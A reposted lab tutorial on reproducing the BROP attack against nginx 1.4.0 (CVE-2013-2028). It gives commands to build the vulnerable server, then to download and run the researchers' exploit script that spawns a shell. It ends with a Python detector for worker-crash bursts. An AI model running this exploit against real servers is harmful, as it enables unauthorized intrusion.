Reposted from: http://ytliu.info/blog/2014/06/01/blind-return-oriented-programming-brop-attack-er/
Following the first session, which covered the principle of the BROP attack, this page discusses how to conduct the real exploit on a Linux system.
This session is more of a tutorial on how I reproduced one of the three attacks conducted by the authors (specifically, attacking nginx 1.4.0 through a buffer overflow bug, CVE-2013-2028, and finally executing a shell) on my PC.
Setting Up Nginx-1.4.0
First, we need to set up the server environment: nginx 1.4.0.
Download the nginx 1.4.0 source code:
(To be completed before configure.)
$ wget nginx.org/download/nginx-1.4.0.tar.gz
$ tar zxvf nginx-1.4.0.tar.gz
$ cd nginx-1.4.0
$ ./configure --sbin-path=/usr/local/nginx/nginx --conf-path=/usr/local/nginx/nginx.conf --pid-path=/usr/local/nginx/nginx.pid --with-http_ssl_module
Before compiling, modify the Makefile to enable stack canary protection (add -fstack-protector to CFLAGS):
$ vim objs/Makefile
...
CFLAGS = -pipe -O -W -Wall -Wpointer-arith -Wno-unused-parameter -Werror -g -fstack-protector
...
Then compile it:
$ make -j4
$ sudo make install
At this point, it is installed in the /usr/local/nginx folder. If you use checksec.sh to check it:
$ wget www.trapkit.de/tools/checksec.sh
$ chmod +x ./checksec.sh
$ ./checksec.sh --file /usr/local/nginx/nginx
You will get the following result:
(RELRO now shows as partial RELRO.)
This means it already has NX and stack canary protection.
Before running nginx, we need to modify its configuration so that it runs with 4 worker processes, then start it:
$ vim /usr/local/nginx/nginx.conf
..
worker_processes 4;
..
$ sudo /usr/local/nginx/nginx
Exploit BROP Attack
Now let's see how to do the BROP attack. It is quite simple, since the authors have already written an nginx-specific attack script in Ruby.
Download the exploit script:
$ wget www.scs.stanford.edu/brop/nginx-1.4.0-exp.tgz
$ tar zxvf nginx-1.4.0-exp.tgz
$ cd nginx-1.4.0-exp
And run it by simply executing:
$ ./brop.rb 127.0.0.1
If everything is ok, it will exploit nginx-1.4.0 using the approach I talked about here, and finally print the id of the exploited shell's owner.
If there is any problem and you want to rerun the script, first remove the state.bin file (or even restart nginx), then run brop.rb again:
$ rm -f ./state.bin
$ ./brop.rb 127.0.0.1
That’s done!
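The attack above only works because each crashed worker is replaced by the master with a fresh fork that keeps the same canary and memory layout, so from the server's side the clearest footprint is a burst of worker crashes in nginx's error_log. The following is an added example (not from the original post or the BROP authors): a Python checker over constructed log lines in nginx's own "worker process N exited on signal S" format; the 60-second gap and 4-crash threshold are assumptions to tune for your deployment.

```python
import re
from datetime import datetime, timedelta

# Constructed sample in nginx's error_log format (these lines are made up, not from a real server).
SAMPLE_LOG = """\
2014/06/01 10:00:00 [notice] 1000#0: start worker processes
2014/06/01 10:00:01 [notice] 1000#0: start worker process 1001
2014/06/01 10:05:10 [alert] 1000#0: worker process 1001 exited on signal 11 (core dumped)
2014/06/01 10:05:10 [notice] 1000#0: start worker process 1005
2014/06/01 10:05:11 [alert] 1000#0: worker process 1002 exited on signal 11 (core dumped)
2014/06/01 10:05:12 [alert] 1000#0: worker process 1003 exited on signal 11 (core dumped)
2014/06/01 10:05:13 [alert] 1000#0: worker process 1004 exited on signal 11 (core dumped)
2014/06/01 10:05:14 [alert] 1000#0: worker process 1005 exited on signal 11 (core dumped)
2014/06/01 10:05:15 [alert] 1000#0: worker process 1006 exited on signal 6 (core dumped)
2014/06/01 11:00:00 [alert] 1000#0: worker process 1020 exited on signal 11 (core dumped)
"""

# Matches the master's alert when a worker dies from a signal (SIGSEGV=11 is the usual one
# for a smashed stack; SIGABRT=6 is what the stack protector raises on a canary mismatch).
CRASH_RE = re.compile(
    r"^(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) \[alert\] \d+#\d+: "
    r"worker process (?P<pid>\d+) exited on signal (?P<sig>\d+)"
)


def parse_crashes(text):
    """Yield (timestamp, pid, signal) for every worker-crash alert line."""
    for line in text.splitlines():
        m = CRASH_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y/%m/%d %H:%M:%S")
            yield ts, int(m["pid"]), int(m["sig"])


def find_crash_bursts(text, threshold=4, max_gap=timedelta(seconds=60)):
    """Group crashes that are at most max_gap apart; report groups of at least
    threshold crashes as (first_ts, last_ts, count). A lone SIGSEGV is noise,
    but a run of them while the master keeps respawning workers is what
    stack reading and gadget probing look like from the server side."""
    bursts, current = [], []
    for ts, pid, sig in parse_crashes(text):
        if current and ts - current[-1][0] > max_gap:
            if len(current) >= threshold:
                bursts.append(current)
            current = []
        current.append((ts, pid, sig))
    if len(current) >= threshold:
        bursts.append(current)
    return [(b[0][0], b[-1][0], len(b)) for b in bursts]
```

Pointing this at a real error_log (and alerting on any burst) gives you a signal that the canary and NX alone do not, since they only make each individual probe crash rather than stop the probing.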